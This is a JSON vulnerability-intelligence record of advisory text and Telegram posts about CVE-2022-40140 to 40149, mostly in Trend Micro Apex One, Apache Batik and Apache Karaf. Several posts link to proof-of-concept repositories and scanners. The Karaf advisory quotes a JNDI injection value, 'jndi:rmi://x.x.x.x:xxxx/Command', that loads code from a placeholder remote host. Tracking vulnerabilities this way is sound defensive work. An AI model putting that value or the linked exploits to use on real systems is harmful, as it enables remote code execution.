{"vulnerability": "CVE-2022-4014", "sightings": [{"uuid": "d99d6221-2af2-4d66-86c0-971d1ee7ef39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40140", "type": "seen", "source": "https://gist.github.com/zredlined/44192ca592721f64cf684ea0019540d0", "content": "", "creation_timestamp": "2025-08-18T15:53:12.000000Z"}, {"uuid": "a50e02fc-8e89-46c7-b653-f26bc0a9eb50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40140", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3414", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA Shodan hunter for CVE-2022-40140 \nURL\uff1ahttps://github.com/ipsBruno/CVE-2022-40140-SCANNER\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-11-13T22:06:28.000000Z"}, {"uuid": "45e0ad8b-bded-416f-a8e9-7ff3b8921e21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40140", "type": "published-proof-of-concept", "source": "https://t.me/pt_soft/270", "content": "\ud83d\uddbc\ufe0f \ud83d\udd04 Moriarty v1.2\n\n\u0427\u0435\u043a\u0435\u0440 CVEs \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 C# \u0434\u043b\u044f \u041e\u0421 \ud83c\udfe0 Windows\n\n\u041f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438:\nWindows 10 (Versions: 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004, 20H2, 21H1, 21H2, 22H1, 22H2)\nWindows 11 (Versions: 21H2, 22H1, 22H2, 23H1)\nWindows Server 2016, 2019, 2022\n\n\u0421\u043f\u0438\u0441\u043e\u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 (35):\nMS10-015\nMS10-092\nMS13-053\nMS13-081\nMS14-058\nMS15-051\nMS15-078\nMS16-016\nMS16-032\nMS16-034\nMS16-135\nCVE-2017-7199\nCVE-2019-0836\nCVE-2019-0836\nCVE-2019-1064\nCVE-2019-1130\nCVE-2019-1253\nCVE-2019-1315\nCVE-2019-1385\nCVE-2019-1388\nCVE-2019-1405\nCVE-2020-0668\nCVE-2020-0683\nCVE-2020-0796\nCVE-2020-1013\nCVE-2020-1013\nCVE-2021-26855\nCVE-2021-26857\nCVE-2021-26858\nCVE-2021-27065\nCVE-2021-44228\nCVE-2021-36934\nCVE-2022-40140\nCVE-2022-22965\nCVE-2023-36664\n\n1.2 added:\n2023-23397\n2022-34718\n\n\ud83d\udc49 \u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439\n\n\u0422\u0430\u043a\u0436\u0435 \u0431\u043e\u0442 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u0438\u0441\u043a \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u043e\u0432 \u043f\u043e CVE\n\n!poc CVE-2019-1064\n\n\ud83d\udcbb Home\n\n\u0414\u043b\u044f \u0441\u0431\u043e\u0440\u043a\u0438 \u043f\u043e\u043d\u0430\u0434\u043e\u0431\u0438\u0442\u0441\u044f Visual Studio \u0438 .NET Framework 4.8 Developer Pack\n\n#moriarty #checker #csharp\n\n\u2708\ufe0f // Pentest HaT \ud83c\udfa9", "creation_timestamp": "2024-05-03T09:04:40.000000Z"}, {"uuid": "ed580273-c687-45a9-9a5e-51d1bb763054", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40140", "type": "seen", "source": "https://t.me/pt_soft/243", "content": "\ud83d\uddbc\ufe0f Moriarty v1.1\n\n\u0427\u0435\u043a\u0435\u0440 CVEs \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 C# \u0434\u043b\u044f \u041e\u0421 \ud83c\udfe0 Windows\n\n\u041f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438:\nWindows 10 (Versions: 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004, 20H2, 21H1, 21H2, 22H1, 22H2)\nWindows 11 (Versions: 21H2, 22H1, 22H2, 23H1)\nWindows Server 2016, 2019, 2022\n\n\u0421\u043f\u0438\u0441\u043e\u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 (35):\nMS10-015\nMS10-092\nMS13-053\nMS13-081\nMS14-058\nMS15-051\nMS15-078\nMS16-016\nMS16-032\nMS16-034\nMS16-135\nCVE-2017-7199\nCVE-2019-0836\nCVE-2019-0836\nCVE-2019-1064\nCVE-2019-1130\nCVE-2019-1253\nCVE-2019-1315\nCVE-2019-1385\nCVE-2019-1388\nCVE-2019-1405\nCVE-2020-0668\nCVE-2020-0683\nCVE-2020-0796\nCVE-2020-1013\nCVE-2020-1013\nCVE-2021-26855\nCVE-2021-26857\nCVE-2021-26858\nCVE-2021-27065\nCVE-2021-44228\nCVE-2021-36934\nCVE-2022-40140\nCVE-2022-22965\nCVE-2023-36664\n\n\ud83d\udc49 \u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439\n\n\u0422\u0430\u043a\u0436\u0435 \u0431\u043e\u0442 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u0438\u0441\u043a \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u043e\u0432 \u043f\u043e CVE\n\n!poc CVE-2019-1064\n\n\ud83d\udcbb Home\n\n\u0414\u043b\u044f \u0441\u0431\u043e\u0440\u043a\u0438 \u043f\u043e\u043d\u0430\u0434\u043e\u0431\u0438\u0442\u0441\u044f Visual Studio \u0438 .NET Framework 4.8 Developer Pack\n\n#moriarty #checker #csharp\n\n\u2708\ufe0f // Pentest HaT \ud83c\udfa9", "creation_timestamp": "2024-03-15T08:58:02.000000Z"}, {"uuid": "acab0d6b-1304-4194-ba2d-dec1dbf15699", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40146", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1130", "content": "CVE-2022-40146 exploit\n\u0414\u044b\u0440\u044b  \u0432 \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u0430\u0445 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e Apache Batik \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u2014 SSRF \u0438 RCE \u0447\u0435\u0440\u0435\u0437 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u0443\u044e \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u043a\u043b\u0430\u0441\u0441\u043e\u0432\nWhat da fuck is this ?  Read \n\n#apache #rce #java", "creation_timestamp": "2022-11-01T10:22:32.000000Z"}, {"uuid": "c08ee595-20a3-4bfc-8e8d-cf8e7dce47bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40146", "type": "published-proof-of-concept", "source": "Telegram/fAWPAqiGGmiCioZoRRJUTpS-505alyTv3gMvgAepMoyqmv8", "content": "", "creation_timestamp": "2022-11-09T03:50:02.000000Z"}, {"uuid": "5cb3d1c0-caa6-487f-a0c4-1268c36c7357", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40146", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/583", "content": "CVE-2022-40146 : Apache XML Graphics Batik 1.14 - Server-Side Request Forgery &amp; RCE\nPOC : https://github.com/cckuailong/CVE-2022-40146_Exploit_Jar", "creation_timestamp": "2022-11-14T21:29:01.000000Z"}, {"uuid": "01d381ba-1610-48ce-a6b6-6b319d7fab96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40144", "type": "seen", "source": "https://t.me/true_secator/3413", "content": "\u034fTrend Micro \u043e\u0431\u044a\u044f\u0432\u0438\u043b\u0430 \u043e\u0431 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0438 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0432\u043a\u043b\u044e\u0447\u0430\u044f 0-day, \u0432 \u0441\u0432\u043e\u0435\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u0438 \u0434\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u044b \u043a\u043e\u043d\u0435\u0447\u043d\u044b\u0445 \u0442\u043e\u0447\u0435\u043a Apex One.\n\n\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2022-40139 \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e\u0439 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u043e\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u043e\u0442\u043a\u0430\u0442\u0430 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430.\u00a0\u041e\u0448\u0438\u0431\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u043c, \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0432 \u0432 \u043a\u043e\u043d\u0441\u043e\u043b\u0435 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430.\n\n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u044e Trend Micro, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0434\u043e\u0431\u0438\u0442\u044c\u0441\u044f RCE \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043a\u043b\u0438\u0435\u043d\u0442\u0430\u043c\u0438 \u043d\u0435\u043f\u0440\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u0430\u043a\u0435\u0442\u0430 \u043e\u0442\u043a\u0430\u0442\u0430.\n\n\u0412 \u0434\u043e\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a 0-day \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Apex One \u0442\u0430\u043a\u0436\u0435 \u0437\u0430\u043a\u0440\u044b\u043b\u0438 \u0438 \u0442\u0440\u0438 \u0434\u0440\u0443\u0433\u0438\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0441 \u0432\u044b\u0441\u043e\u043a\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u044c\u044e \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 \u0438 \u0434\u0432\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0441\u043e \u0441\u0440\u0435\u0434\u043d\u0435\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u044c\u044e \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438.\n\n\u0421\u0430\u043c\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043d\u0430\u044f \u0438\u0437 \u043d\u0438\u0445 \u2014 CVE-2022-40144, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043e\u0431\u043e\u0439\u0442\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432.\u00a0\n\n\u0422\u0435\u043e\u0440\u0435\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0435\u0435 \u043c\u043e\u0436\u043d\u043e \u0441\u0432\u044f\u0437\u0430\u0442\u044c \u0441 \u0432\u044b\u0448\u0435\u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u044b\u043c 0-day \u0434\u043b\u044f \u043f\u0440\u0435\u043e\u0434\u043e\u043b\u0435\u043d\u0438\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u043d\u043e \u043e\u0431 \u044d\u0442\u043e\u043c Trend Micro \u043d\u0435 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442\u0441\u044f, \u0440\u0430\u0432\u043d\u043e \u043a\u0430\u043a \u0438 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442 \u043e\u0431 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 CVE-2022-40144 \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445.\n\n\u0414\u0440\u0443\u0433\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 Trend Micro, \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439, DoS-\u0430\u0442\u0430\u043a \u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e \u0446\u0435\u043b\u0435\u0432\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435.\n\n\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 \u0430\u0442\u0430\u043a\u0430\u0445 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c CVE-2022-40139 Trend Micro \u0442\u0430\u043a\u0436\u0435 \u043d\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0430. \u041d\u043e \u043a\u0430\u043a \u043c\u044b \u0437\u043d\u0430\u0435\u043c, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043d\u0435\u0440\u0435\u0434\u043a\u043e\u00a0\u043d\u0430\u0446\u0435\u043b\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438. \n\n\u0417\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043b\u0435\u0442 \u0445\u0430\u043a\u0435\u0440\u0430\u043c\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0432\u043e\u0441\u0435\u043c\u044c \u0442\u0430\u043a\u0438\u0445 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u0432, \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0438\u0437 \u043d\u0438\u0445 \u043a\u0430\u043a \u0440\u0430\u0437 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u043b\u0438\u00a0\u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Apex. \u0411\u0430\u0433\u0438 \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u043b\u0438\u0441\u044c \u0432 \u0446\u0435\u043b\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445.", "creation_timestamp": "2022-09-14T14:27:02.000000Z"}, {"uuid": "3ba4ad78-bcb0-4c55-b084-3d9608dcfdc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40146", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/1319", "content": "", "creation_timestamp": "2022-11-01T15:16:16.000000Z"}, {"uuid": "fa117fc7-c3f8-43ae-94f4-6a0e6d486589", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40145", "type": "seen", "source": "https://t.me/cibsecurity/55054", "content": "\u203c CVE-2022-40145 \u203c\n\nThis vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, \"osgi:\" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://x.x.x.x:xxxx/Command\");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-12-22T05:38:07.000000Z"}, {"uuid": "0a1e5617-e970-4402-843f-15b28b484209", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40147", "type": "seen", "source": "https://t.me/cibsecurity/51109", "content": "\u203c CVE-2022-40147 \u203c\n\nA vulnerability has been identified in Industrial Edge Management (All versions &lt; V1.5.1). The affected software does not properly validate the server certificate when initiating a TLS connection. This could allow an attacker to spoof a trusted entity by interfering in the communication path between the client and the intended server.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-10-11T14:25:59.000000Z"}, {"uuid": "6de3e2fd-954b-4ea1-a1c7-b4208571445d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40146", "type": "seen", "source": "https://t.me/cibsecurity/50266", "content": "\u203c CVE-2022-40146 \u203c\n\nServer-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to access files using a Jar url. This issue affects Apache XML Graphics Batik 1.14.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-09-22T18:12:19.000000Z"}, {"uuid": "350686e1-a71d-4be3-8974-68c926ad424f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40143", "type": "seen", "source": "https://t.me/cibsecurity/50084", "content": "\u203c CVE-2022-40143 \u203c\n\nA link following local privilege escalation vulnerability in Trend Micro Apex One and Trend Micro Apex One as a Service servers could allow a local attacker to abuse an insecure directory that could allow a low-privileged user to run arbitrary code with elevated privileges. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-09-19T22:38:20.000000Z"}, {"uuid": "3652c4f3-e67c-4865-ba11-493e80f56c7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40142", "type": "seen", "source": "https://t.me/cibsecurity/50080", "content": "\u203c CVE-2022-40142 \u203c\n\nA security link following local privilege escalation vulnerability in Trend Micro Apex One and Trend Micro Apex One as a Service agents could allow a local attacker to create a writable folder in an arbitrary location and escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-09-19T22:38:17.000000Z"}, {"uuid": "94b9c132-5ef3-46ab-a7e2-22dff69312a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40141", "type": "seen", "source": "https://t.me/cibsecurity/50078", "content": "\u203c CVE-2022-40141 \u203c\n\nA vulnerability in Trend Micro Apex One and Apex One as a Service could allow an attacker to intercept and decode certain communication strings that may contain some identification attributes of a particular Apex One server.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-09-19T22:38:14.000000Z"}, {"uuid": "1a04b376-0338-450d-a509-a4fedbf25710", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40144", "type": "seen", "source": "https://t.me/cibsecurity/50076", "content": "\u203c CVE-2022-40144 \u203c\n\nA vulnerability in Trend Micro Apex One and Trend Micro Apex One as a Service could allow an attacker to bypass the product\u00e2\u20ac\u2122s login authentication by falsifying request parameters on affected installations.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-09-19T22:38:12.000000Z"}, {"uuid": "a99d0ac1-5267-4205-8317-a923ce4002d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40140", "type": "seen", "source": "https://t.me/cibsecurity/50074", "content": "\u203c CVE-2022-40140 \u203c\n\nAn origin validation error vulnerability in Trend Micro Apex One and Apex One as a Service could allow a local attacker to cause a denial-of-service on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-09-19T22:38:10.000000Z"}, {"uuid": "d17bc43a-bbb9-4cfc-9481-eb0ef1a0e15d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40149", "type": "seen", "source": "https://t.me/cibsecurity/49897", "content": "\u203c CVE-2022-40149 \u203c\n\nThose using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. This effect may support a denial of service attack.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-09-16T14:38:41.000000Z"}, {"uuid": "6baee2d3-c615-4da0-9d76-896957855d4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40140", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2467", "content": "#CVE-2022\nA Shodan hunter for CVE-2022-40140 \n\nhttps://github.com/ipsBruno/CVE-2022-40140-SCANNER\n\n@BlueRedTeam", "creation_timestamp": "2022-11-16T11:11:16.000000Z"}, {"uuid": "7d68fb40-475c-4e02-91d0-6567155593d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40140", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/6904", "content": "#exploit\n1. CVE-2022-40140, CVE-2022-41082:\n\"ProxyNotShell\"\nhttps://github.com/LivingFree8/CVE-2022-41082-RCE-POC\n\n2. CVE-2022-30600:\nMoodle Failed Login\nhttps://github.com/Boonjune/POC-CVE-2022-30600\n\n3. A kernel exploit leveraging NtUserHardErrorControl to elevate a thread to KernelMode and achieve arbitrary kernel R/W\nhttps://github.com/SecIdiot/ANGRYORCHARD", "creation_timestamp": "2022-12-21T04:56:56.000000Z"}, {"uuid": "6053640f-6fc6-4d31-8549-2f6364f16f6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-40146", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/7094", "content": "#exploit\n1. CVE-2022-38398, CVE-2022-40146:\nVulnerabilities in Apache Batik Default Security Controls - SSRF/RCE Through Remote Class Loading\nhttps://www.zerodayinitiative.com/blog/2022/10/28/vulnerabilities-in-apache-batik-default-security-controls-ssrf-and-rce-through-remote-class-loading\n\n2. CVE-2022-0739:\nSQLI BookingPress &lt;1.0.11 - Unauth SQL Injection\nhttps://github.com/Chris01s/CVE-2022-0739", "creation_timestamp": "2022-11-03T11:05:13.000000Z"}]}